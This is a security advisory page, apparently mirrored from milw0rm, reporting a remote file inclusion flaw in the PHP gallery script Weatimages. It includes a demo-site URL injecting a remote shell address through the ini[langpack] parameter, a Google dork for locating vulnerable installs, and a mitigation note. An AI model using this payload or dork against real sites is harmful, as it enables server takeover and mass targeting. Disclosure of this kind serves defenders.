Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  PunBB <= 1.2.14 Multiple Vulnerabilities (Advisory)

  phpGalleryScript 1.0 (init.gallery.
php include_class) RFI Vulnerability

  Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution

  php-generics 1.0 Remote File Inclusion Vulnerabilities

From:Co-Sarper-Der <Sarperonline_(at)_gmail.com>
Date:11 апреля 2007 г.
Subject:RFI Weatimages Hack

RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http
://www.nazarkin.name/projects/weatimages/demo/index.php?ini
[langpack]=shellad
ress
Google Dork : inurl: index.php?ini[langpack]=

Author:Co-Sarper-Der
Contact:Sarperonline@gmail.com
Note:Thanx to ForeveRIslam

side note:

4. Installation

Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.

If weatimages.ini was uploaded too then the product isn't vulnerable.

# milw0rm.com [2007-04-10]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород